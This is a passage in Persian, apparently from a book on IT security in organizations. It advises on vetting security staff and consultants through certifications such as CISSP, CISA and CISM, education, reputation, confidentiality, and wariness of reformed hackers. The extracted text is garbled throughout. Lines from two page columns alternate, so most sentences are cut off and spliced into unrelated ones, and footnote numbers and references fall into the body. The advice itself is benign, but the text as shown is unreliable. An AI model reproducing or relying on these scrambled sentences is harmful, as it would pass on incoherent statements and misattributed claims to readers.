ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺑﻌﻀﻲ ﺷـﺮﻛﺘﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﺍﺭﺍﺋـﻪ ﻫـﺮ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳـﻮﺍﺑﻖ ﻛـﺎﺭﻱ ﺩﺭ ﻳـﻚ ﺣـﻮﺯﺓ
ﺍﻃﻼﻋـــﺎﺗﻲ ﺍﺯ ﺷـــﻤﺎ ﺑﺨﻮﺍﻫﻨـــﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـــﻪﺍﻱ ﺩﺍﻝ ﺑـــﺮ ﺧﺎﺹ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺭﻧﻤﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ؛ ﺍﻣـﺎ
ﺳﺮﻱ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺳﻨﺎﺩ ﺍﻣﻀﺎ ﻛﻨﻴﺪ .ﺍﺯ ﺧﺪﻣﺎﺕ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺤﺘﺎﻁ ﺑﺎﺷﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺷـﻮﺍﻫﺪ ﺭﻭﺷـﻨﻲ ﺑـﺮﺍﻱ
ﺍﺳﻢ ﻭ ﺍﺳﻨﺎﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻭ ﺗﺄﻳﻴﺪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ.
ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﻮﻥ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺷﻤﺎ ﻧﻴﺰ ﺑﺪﻭﻥ ﻣﺠـﻮﺯ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﻌـﺪﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺎ ﻣﺴﺎﺋﻞ ﺯﻳﺮ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷـﺘﻪ
ﺧﻮﺩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧـﺎﺭﺝ ﺑﺎﺷﻨﺪ:
ﺑﺪﻧﺒﺎﻝ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎﺷﻴﺪ؛ ﺑﺨﺼﻮﺹ: ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﺎ ﻳﻚ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻛﻤﻚ ﮔﺮﻓﺘﻴﺪ ،ﻓﺮﺍﻣـﻮﺵ ﻧﻜﻨﻴـﺪ
ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺷﺮﺍﻳﻂ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﺔ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻇﺮﻓﻴﺖ ﻣﺤﻠﻲ ﺳﺎﺯﻣﺎﻥ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﺸﻮﺭ ﺷـﻤﺎ ﻛﻤـﻚ
ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑﺨﻮﺍﻫﻴﺪ ﻭ ﺍﺯ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻛﻨﻨﺪ.
ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﺯ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻗﺎﺑﻞ
ﻼ ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﻃﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮔﺬﺍﺭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺍﻳﻦ ﻛﺎﻣ ﹰ
ﺧﺮﻳﺪ ﻫﺴﺘﻨﺪ ﻭ ﻓﺮﺩ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺩﺭ ﻳﻜـﺴﺮﻱ ﺍﺯ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻛﻤﻚ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺧـﺎﺭﺟﻲ ﺍﺳـﺘﻔﺎﺩﻩ
ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻳـﺎ ﻛﻼﺳـﻬﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺷـﺮﻛﺖ ﻛﻨـﺪ،
ﻣﻄﺎﻟﺐ ﺗﺌﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ ،ﻭ ﺳﺆﺍﻻﺕ ﻛﻨﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺍﺑـﻂ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ
ﺗﺴﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﭼﻨﺪﺍﻥ ﺍﺭﺯﺷﻤﻨﺪ ﻧﻴـﺴﺘﻨﺪ. ﺩﺍﻧﺶ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺘﻌﺪﺍﺩﻫﺎﻱ ﺑـﻮﻣﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﺠﺎﺭﺏ ﻋﻤﻠﻲ ﻭ ﺍﻣﻜﺎﻥ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﺗﺨﺼﺺ ﻋﻤﻴﻘﺘﺮ ﻣﻲﺑﺎﺷﻨﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ
ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫﻨﻮﺯ ﻳﻚ ﺑﺤﺚ ﺩﺭﺣﺎﻝ ﺗﻜﺎﻣﻞ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺍﺯ ﺍﺷـﺎﺭﻩ
ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻓﻌﻠﻲ ﺁﻥ ﺍﻛﺮﺍﻩ ﺩﺍﺭﻳﻢ ،ﺍﻣﺎ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺑﻪ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ١٠٦CISSPﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻫﺮﭼﻨـﺪ ﻫﻤـﺔ ﺁﻥ ﻣﻬﻤﺘــﺮ ﺍﺯ ﻫﻤــﻪ ﺑﺎﻳــﺪ ﺩﺭ ﻓﻜــﺮ ﺍﻓــﺮﺍﺩﻱ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺧــﺪﻣﺎﺕ
ﭼﻴﺰﻱ ﻧﻴﺴﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ،ﺍﻣﺎ ﻳﻚ ﻣﺪﺭﻙ ﻣﻌﺘﺒـﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ.
ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺳﻄﺤﻲ ﻣﻌﻴﻦ ﺍﺯ ﺗﺠﺮﺑﻪ ﻭ ﺗﺨﺼﺺ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺑﺮ ﺧﻼﻑ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩﺍﻱ ،ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﺎﻭﺭﻳﻨﻲ ﻛـﻪ
١٠٧ ﺑﺮﺍﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣـﺪﻩﺍﻧـﺪ ﺑﺎﻳـﺪ ﺑـﺴﻴﺎﺭ
ﺍﺳﺖ.
ﻣﺤﺘﺎﻃﺎﻧﻪ ﺭﻓﺘﺎﺭ ﻛﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻧﻴﺮﻭﻱ ﺧـﺎﺭﺟﻲ ﺑـﺮﺍﻱ
ﺗﺤﺼﻴﻼﺕ ﻻ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺳـﻄﻮﺣﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ
ﺳﻮﺍﺑﻖ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﻓـﺮﺍﺩ ﻣﻬـﺎﺭﺕ ﺑـﺎﻻﻱ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ.
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻧﺘﻴﺠﺔ ﻣﻄﺎﻟﻌـﻪ ﻭ ﺗﺠﺮﺑـﺔ ﺷﺨـﺼﻲ ﺑﺪﺳـﺖ
ﻼ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﺎﻫ ﹺﺮ ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻗﺒ ﹰ
ﺁﻭﺭﺩﻩﺍﻧﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺩﺭﺑﺎﺭﺓ ﻋﻠﻮﻡ ﻭ ﻣﻬﻨﺪﺳﻲ ﺭﺍﻳﺎﻧـﻪ ﻣـﺪﺍﺭﻙ
ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﻤﺎ
ﺗﺤﺼﻴﻠﻲ ﻭ ﺩﺍﻧﺸﻜﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺑﺎﻭﺭ ﺟﻬﺎﻧﻲ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺑﺎﻳﺪ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﻛـﻪ
ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻣﻬﻤﺘﺮ ﺍﺯ ﻣﺪﺍﺭﻙ ﺍﺳﺖ .ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺩﺭ ﺑﺨـﺶ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﺟﺎﻣﻊ ﻧﻴﺴﺖ ،ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﺯ ﻋﻬـﺪﺓ ﻛﺎﺭﺗـﺎﻥ ﺑـﺮ
ﻛﺎﺭﻛﻨﺎﻥ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺍﺩﻋﺎﻫﺎﻱ ﻣﺘﻘﺎﺿـﻴﺎﻥ
ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺗﺨـﺼﺺ ﺧـﻮﺩ ﺍﺩﻋﺎﻫـﺎﻱ
ﺑﺎ ﻣﺪﺍﺭﻛﺸﺎﻥ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ .ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳـﺎﻻﺕ
ﺩﺭﻭﻏﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﻛﻪ ﺗﺨﺼﺼﺸﺎﻥ ﺑـﻪ ﺁﻧﭽـﻪ ﺑـﺪﺍﻥ ﻧﻴـﺎﺯ
ﻣﺘﺤﺪﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ ﻣﺆﺳـﺴﺔ
ﺩﺍﺭﻳﺪ ﻧﺎﻣﺮﺑﻮﻁ ﺍﺳﺖ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﺧﺪﻣﺎﺕ ﻓﺮﺩ ﻳﺎ
ﺁﻣﻮﺯﺷﻲ ﺭﺍ ﺑﻌﻨﻮﺍﻥ "ﻗﻄﺒﻬﺎﻱ ﺁﻣﻮﺯﺷﻲ" ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻃﺒﻖ
ﺷﺮﻛﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺧﻮﺩ ﺍﻋﺘﺮﺍﻑ ﻣﻲﻛﻨﻨﺪ "ﺩﺭ ﺧﻼﻝ ﻛـﺎﺭ،
ﺁﻥ ﻓﻬﺮﺳﺖ ﻃﺮﺣﻬﺎﻱ ﭘﻴـﺸﺮﻭﻱ ﻣﺆﺳـﺴﺔ infosecﺩﺭ ﮊﻭﺋـﻦ
ﻳﺎﺩﮔﻴﺮﻱ ﻫﻢ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ" )ﻭ ﺍﺣﺘﻤﺎ ﹰ
ﻻ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﺟﻪ ﻛﻤﺘـﺮﻱ
۲۰۰۲ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺟﺮﺝ ﻣﻴـﺴﻮﻥ ،١٠٨ﺟﻴﻤـﺰ ﻣﺪﻳـﺴﻮﻥ،١٠٩
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ( ،ﺗﺎ ﺍﻳﻨﻜـﻪ ﻓـﺮﺩﻱ ﺍﺳـﺘﺨﺪﺍﻡ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﻼﺵ
ﺍﻳﺎﻟﺖ ﺍﻳﺪﺍﻫﻮ ،١١٠ﺍﻳﺎﻟـﺖ ﺁﻳـﻮﺍ ،١١١ﺁﻣﻮﺯﺷـﮕﺎﻩ ﻛﺎﺭﺷﻨﺎﺳـﻲ ﺍﺭﺷـﺪ
ﻣﻲﻛﻨﺪ ﻧﻘﺎﻳﺺ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻛﻨﺪ.
ﺑﺎﺯﺍﺭﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ
۱۰۶ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﭘﻮﺭﺗﺎﻝ ﻭﺏ CISSPﺩﺭ: ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺑـﺴﺘﺮﻫﺎﻱ Windowsﺩﺭ ﺳـﻄﻮﺡ
http://www.cissps.com/
۱۰۷ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻳﺮ ﺩﺭ ﺁﺩﺭﺱ www.isaca.orgﺭﺍ ﻧﻴﺰ ﺑﺒﻴﻨﻴﺪ: ﻣﺨﺘﻠﻒ ﺗﺨﺼﺺ ﺩﺍﺭﻧـﺪ ﺍﺷـﺒﺎﻉ ﺷـﺪﻩ ﺍﺳـﺖ ،ﺍﻣـﺎ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ
)CISA (Certified Information Security Auditor ﺑﺴﺘﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺯ ﺟﻤﻠﻪ Unixﻛﻤﺘﺮ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻛﺘﺎﺑﻬﺎ ﻣﻲﺗﻮﺍﻥ
CISM (Certified Information Security
)Manager ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺁﻣﻮﺧﺖ ،ﺍﻣﺎ ﺗﻨﻬﺎ ﻣﻄﺎﻟﻌﺔ ﻛﺘﺎﺏ
108 George Mason University
109 James Medison University ﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﻧﮕﺮﺍﻧـﻲ ﺩﺍﺭﻳـﺪ
110 Idaho
111 Iowa
١٧١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻧﻴﺮﻭﻱ ﺩﺭﻳﺎﻳﻲ ،ﺩﺍﻧﺸﮕﺎﻩ ﭘﻮﺭﺩﻭ ،١١٢ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ
ﺩﺭ ﺩﻳﻮﻳﺲ ،١١٣ﻭ ﺩﺍﻧﺸﮕﺎﻩ ﺍﻳﺪﺍﻫﻮ ﺍﺭﺍﺋﻪ ﺷﺪﻧﺪ .ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬـﺎﻥ
ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﻛﺎﺭ ﺑﺎ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺩﻋﺎ ﻣـﻲﻛﻨﻨـﺪ
ﻣﺮﺍﻛﺰ ﻣﻘﺪﻣﺎﺗﻲ ﻓﺮﺍﻭﺍﻧـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ
ﺩﺍﺭﻧﺪ .ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ ﺧﻮﺩ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗـﺎ
ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ ١١٤.ﺍﮔﺮﭼﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺍﺭﺗﻜـﺎﺏ
ﻣﺮﺍﻛﺰ ﻣﺸﺎﺑﻬﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﺠﺎ ﻣﺴﺘﻘﺮ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﻴﺎﺑﻴﺪ.
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﻋﻀﻮ ﻣﻔﻴﺪﻱ
ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳﻜـﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺑﺨـﺶ
ﺍﺯ ﺟﺎﻣﻌﻪ ﺷﻮﻧﺪ ،ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻪ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﺮﺗﻜﺐ ﺟﺮﺍﺋﻢ
ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﺋﻴﺪ.
ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺳﻮﺀ ﺳﺎﺑﻘﻪ ﺩﺍﺭﻧﺪ ﺧﻮﺵ ﺑﻴﻦ ﺷﺪ .ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻜﺎﺕ
ﺯﻳﺮ ﻗﺎﺑﻞ ﺍﺷﺎﺭﻩﺍﻧﺪ: ﺷﻬﺮﺕ
ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﺧﻮﺩ ﺳﺎﺑﻘﺔ ﺧﺪﺷﻪﺩﺍﺭ .۱ ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﭘﺮﻛﺎﺭﺑﺮﺩ ﻧﻮﺷـﺘﻪ ﺑﺎﺷـﺪ ﻳـﺎ ﺩﺭ ﻳـﻚ
ﻛﺮﺩﻥ ﻗﺎﻧﻮﻥ ،ﻣﺎﻟﻜﻴـﺖ ﺷﺨـﺼﻲ ،ﻭ ﺣﻘـﻮﻕ ﺧـﺼﻮﺻﻲ ﻣﻮﺿﻮﻉ ﺍﻣﻨﻴﺘﻲ ﻣﺜﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﺘﺎﺑﻲ ﺗـﺄﻟﻴﻒ ﻛـﺮﺩﻩ
ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ﺍﻧﺘﺨﺎﺏ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺭﺍﺋـﻲ ﻭ ﺑﺎﺷﺪ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺷﻨﺎﺳﺖ.
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﺣﺮﺍﺳـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ ﺑﺮﺧﻲ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺳﺎﺑﻘﺔ ﺯﻳﺎﺩﻱ ﺩﺭ ﺩﺍﻣﻨﺔ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣـﺴﺎﺋﻞ
ﺑﺎﺷﻨﺪ .ﺁﻳﺎ ﺷﻤﺎ ﺣﺎﺿﺮﻳﺪ ﺍﺯ ﻳﻚ ﻣﺠـﺮﻡ ﺳـﺎﺑﻘﻪﺩﺍﺭ ﺑـﺮﺍﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺗﻨﻬﺎ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ
ﺑﺨﺶ ﺳﻮﻡ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﻭ ﻫﺸﺪﺍﺭ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ .ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺷـﻬﺮﺕ ﺯﻳـﺎﺩ ﻟﺰﻭﻣـﹰﺎ ﺑـﻪ ﻣﻌﻨـﺎﻱ
ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺣﺎﺿﺮﻳﺪ ﻳﻚ ﺗﺒﻬﻜـﺎﺭ ﺍﺻـﻼﺡ ﺷـﺪﻩ ﺭﺍ ﺑـﺮﺍﻱ ﺷﺎﻳﺴﺘﮕﻲ ﺑﺮﺍﻱ ﻣﺸﺎﻭﺭﻩ ﻧﻤﻲﺑﺎﺷﺪ.
ﺍﺩﺍﺭﺓ ﻣﺮﻛﺰ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﻭﻳﮋﺓ ﺷﺮﻛﺖ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ؟ ﺍﻳـﻦ
